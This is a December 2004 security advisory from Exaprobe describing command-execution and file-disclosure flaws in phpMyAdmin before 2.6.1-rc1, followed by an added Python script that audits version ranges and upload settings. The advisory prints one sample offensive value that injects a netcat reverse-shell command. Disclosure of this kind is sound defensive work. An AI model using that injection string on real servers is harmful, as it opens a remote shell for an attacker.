[VulnWatch] Multiple vulnerabilities in phpMyAdmin

From: Nicolas Gregoire (ngregoire_at_exaprobe.com)
Date: 12/13/04

    To: bugtraq@securityfocus.com, full-disclosure@lists.netsys.com, vulnwatch@vulnwatch.org
    Date: Mon, 13 Dec 2004 14:02:09 +0100
    
    

                                    Exaprobe
                                www.exaprobe.com

                               Security Advisory

     Advisory Name: Multiple vulnerabilities in phpMyAdmin
      Release Date: 13 December 2004
       Application: phpMyAdmin prior to 2.6.1-rc1
          Platform: Any webserver running PHP
          Severity: Remote code execution
            Author: Nicolas Gregoire <ngregoire@exaprobe.com>
     Vendor Status: Updated code is available
    CVE Candidates: CAN-2004-1147 and CAN-2004-1148
         Reference: www.exaprobe.com/labs/advisories/esa-2004-1213.html

    Overview :
    ==========

    phpMyAdmin is a tool written in PHP intended to handle the
    administration of MySQL over the Web. Currently it can create and
    drop databases, create/drop/alter tables, delete/edit/add fields,
    execute any SQL statement, manage keys on fields, manage privileges,
    export data into various formats and is available in 47 languages.

    Technical details :
    ===================

    Command execution :

            - bug introduced in 2.6.0-pl2
            - attacker does *not* need access to the phpMyAdmin interface
            - PHP safe mode must be off
            - external transformations must be activated
            - sample of offensive value : F\';nc -e /bin/sh $IP 80;echo \'A

    File disclosure :

            - attacker needs access to the phpMyAdmin interface
            - PHP safe mode must be off
            - $cfg['UploadDir'] must be defined
            - exploitation is done via 'sql_localfile'

    Vendor Response :
    =================

    After notification by Exaprobe, maintainers of the phpMyAdmin
    project have released version 2.6.1-rc1 which fixes these two
    vulnerabilities.

    Recommendation :
    ================

    Upgrade to 2.6.1-rc1 or newer.
    Deactivate uploads and transformations if possible.

    CVE Information :
    =================

    The Common Vulnerabilities and Exposures (CVE) project has assigned
    the following names to these issues. These are candidates for
    inclusion in the CVE list (http://cve.mitre.org), which standardizes
    names for security problems.

      CAN-2004-1147 Command execution in phpMyAdmin
      CAN-2004-1148 File disclosure in phpMyAdmin

    -- 
    Nicolas Gregoire ----- Information Systems Security Consultant
    ngregoire@exaprobe.com ------[ ExaProbe ]------ http://www.exaprobe.com/
    PGP KeyID:CA61B44F  FingerPrint:1CC647FF1A55664BA2D2AFDACA6A21DACA61B44F
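
An audit check for the version ranges and the `$cfg['UploadDir']` precondition listed in the advisory above; this is an added example, not part of the original advisory and not phpMyAdmin code. It assumes phpMyAdmin's suffix ordering (alpha < beta < rc < release < pl) and a plainly written `config.inc.php`; the function names and the sample config are hypothetical, and PHP safe mode and the external-transformation setting are not checked.

```python
import re

# Ordering of phpMyAdmin version suffixes relative to the plain release:
# alpha < beta < rc < (release) < pl (patch level issued after the release).
_STAGE = {"alpha": -3, "beta": -2, "rc": -1, "": 0, "pl": 1}
_VERSION_RE = re.compile(r"^(\d+)\.(\d+)\.(\d+)(?:-(alpha|beta|rc|pl)(\d*))?$")
_UPLOADDIR_RE = re.compile(
    r"""^\s*\$cfg\[['"]UploadDir['"]\]\s*=\s*(['"])(.*?)\1\s*;""", re.M)

FIXED = "2.6.1-rc1"           # from the advisory: first fixed version
CMD_EXEC_FROM = "2.6.0-pl2"   # from the advisory: bug introduced here


def version_key(version):
    """Turn '2.6.0-pl2' into a tuple that sorts in release order."""
    m = _VERSION_RE.match(version.strip().lower())
    if not m:
        raise ValueError("unrecognised phpMyAdmin version: %r" % version)
    major, minor, patch, stage, num = m.groups()
    return (int(major), int(minor), int(patch),
            _STAGE[stage or ""], int(num or 0))


def upload_dir_defined(config_text):
    """True if the last uncommented $cfg['UploadDir'] assignment is non-empty."""
    values = [m.group(2) for m in _UPLOADDIR_RE.finditer(config_text)]
    return bool(values) and values[-1] != ""


def assess(version, config_text):
    """Map each CVE candidate to whether the preconditions checked here hold."""
    v = version_key(version)
    unfixed = v < version_key(FIXED)
    return {
        "CAN-2004-1147": unfixed and v >= version_key(CMD_EXEC_FROM),
        "CAN-2004-1148": unfixed and upload_dir_defined(config_text),
    }


# Constructed sample input, not taken from a real installation.
SAMPLE_CONFIG = """<?php
// $cfg['UploadDir'] = '/tmp/old';
$cfg['UploadDir'] = '/var/lib/phpmyadmin/upload';
"""

if __name__ == "__main__":
    for ver in ("2.6.0-pl1", "2.6.0-pl3", "2.6.1-rc1"):
        print(ver, assess(ver, SAMPLE_CONFIG))
```

A plain string comparison would rank `2.6.1` below `2.6.1-rc1` and report a fixed release as unfixed, which is why the suffix is mapped to a numeric stage.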
    
